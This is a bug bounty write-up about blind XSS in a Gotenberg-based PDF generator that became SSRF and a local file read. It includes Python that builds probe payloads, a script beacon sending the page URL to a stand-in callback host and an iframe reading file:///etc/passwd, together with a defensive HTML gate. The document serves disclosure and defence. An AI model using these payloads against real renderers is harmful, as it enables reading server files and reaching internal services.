
Blind XSS To SSRF

Jan 29, 2023

During bug hunting in a private bug bounty program, I came across a feature within the application that allowed for the generation of PDF documents. Since the user input was reflected in the generated PDF documents, I decided to try injecting HTML and XSS payloads.

I used a well-known tool called XSSHunter, which allows us to find blind cross-site scripting vulnerabilities. To my surprise, my payload was immediately executed and I was able to retrieve the screenshot and the following details on XSSHunter.


Further investigation revealed that the payload had been executed on the file path “file:///gotenberg/e86fbc55ef893d878821c1bc76c3b1e3/index.html”.

Gotenberg is an open-source API for converting HTML, Markdown and Office documents to PDF. It does not parse the HTML itself: it writes the submitted document into a per-request working directory and opens it in a headless browser (Chromium), which renders the page and prints it to PDF. That is why the payload reported a file:// URL under /gotenberg/ as its location: the user-supplied HTML was being rendered as a local file inside the container, with whatever JavaScript and subresource loading the browser allows.

Upon further testing, the conversion turned out to be exploitable for server-side request forgery: the headless browser fetches every URL the document references, using the server's own access. I was able to successfully execute a payload that included an iframe with the src set to “file:///etc/passwd”, and the contents of the “/etc/passwd” file were rendered into the returned PDF.


This class of vulnerability lets an attacker read files from the rendering host (any path the converter's process can open, via file:// URLs) and reach network locations from the server's position, such as internal HTTP services that are not exposed to the Internet. Because the rendered page is returned to the attacker as a PDF, the response is not blind: the fetched content comes back in the document. Depending on what the host can reach, this ranges from disclosure of configuration and credentials to full compromise of the environment.
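As an added example (not code from the original post or from the Gotenberg project), the two probes described above and a pre-render gate that refuses markup the headless browser would turn into a file read, a script execution or an internal request. The callback host, the function names and the sample documents are assumptions made for the example; the check uses only the Python standard library.

```python
"""Probe payloads for an HTML-to-PDF renderer plus a pre-render gate.

The gate is a denylist on tags and an allowlist on URL schemes: anything
that is not http(s) is refused, including relative URLs, because a relative
URL resolved against a file:///gotenberg/<id>/index.html base becomes a
file:// URL (../../etc/passwd works as well as file:///etc/passwd).
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

BEACON_HOST = "collector.example.invalid"   # hypothetical callback host


def blind_xss_beacon(host: str = BEACON_HOST) -> str:
    """Blind-XSS probe: if JavaScript runs inside the renderer, it reports the
    document's own URL, which is how a file:///gotenberg/... path shows up."""
    return ('<script>new Image().src="https://' + host + '/c?u="'
            '+encodeURIComponent(document.location.href);</script>')


def file_read_iframe(path: str = "/etc/passwd") -> str:
    """Local file read: the renderer loads the file: URL into the frame and
    the file's text ends up in the produced PDF."""
    return f'<iframe src="file://{path}" width="800" height="600"></iframe>'


# Elements that run script, load a URL, navigate, or carry CSS url() loads.
DANGEROUS_TAGS = {"script", "iframe", "frame", "object", "embed", "link",
                  "meta", "base", "form", "style"}
# Attributes whose value the browser fetches (suffix match covers xlink:href).
URL_ATTRS = {"src", "href", "data", "action", "formaction", "poster",
             "background", "srcset"}
ALLOWED_SCHEMES = {"http", "https"}


def _candidate_urls(name: str, value: str):
    """srcset holds "url 1x, url 2x"; every other attribute holds one URL."""
    if name == "srcset":
        return [c.strip().split()[0] for c in value.split(",") if c.strip()]
    return [value.strip()]


class _Gate(HTMLParser):
    def __init__(self) -> None:
        # convert_charrefs=True (default): &#x66;ile:/// is decoded before we
        # look at it, so entity-encoded schemes do not slip through.
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):       # tag and attr names arrive lowercased
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"tag <{tag}>")
        for name, value in attrs:
            if name.startswith("on") or name == "style":
                self.findings.append(f"{tag}[{name}] attribute")
                continue
            if name.split(":")[-1] in URL_ATTRS and value is not None:
                for url in _candidate_urls(name, value):
                    scheme = urlsplit(url).scheme.lower()
                    if scheme not in ALLOWED_SCHEMES:
                        self.findings.append(f"{tag}[{name}] scheme {scheme!r}")


def scan_html(html: str) -> list:
    """Return a list of reasons the document must not be sent to the renderer."""
    gate = _Gate()
    gate.feed(html)
    gate.close()
    return gate.findings


def safe_to_render(html: str) -> bool:
    return not scan_html(html)


if __name__ == "__main__":
    # Constructed sample documents: a benign invoice and the two probes.
    samples = {
        "invoice": '<p>Invoice for <b>Alice</b> <img src="https://cdn.example.invalid/logo.png"></p>',
        "beacon": blind_xss_beacon(),
        "file read": file_read_iframe(),
        "traversal": '<img src="../../../etc/passwd">',
    }
    for label, doc in samples.items():
        print(f"{label:10} safe={safe_to_render(doc)!s:5} {scan_html(doc)}")
```

The gate is a second line of defence. The fix that actually removes the bug is to stop the renderer from being able to fetch anything useful: run the converter with JavaScript disabled, with no route to internal networks or cloud metadata, and with file access limited to the request's own working directory (newer Gotenberg releases expose allow/deny options for the URLs Chromium may load; check the documentation for the version you run).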

I immediately reported my findings to the security team, who classified the vulnerability as high. However, another security researcher had also reported the vulnerability at the same time. As a result, the team decided to split the bounty and I received $500.


The original XSS Hunter service has since been deprecated and is no longer available. A new version has been launched by Truffle Security at https://xsshunter.trufflesecurity.com.

Resources

https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf
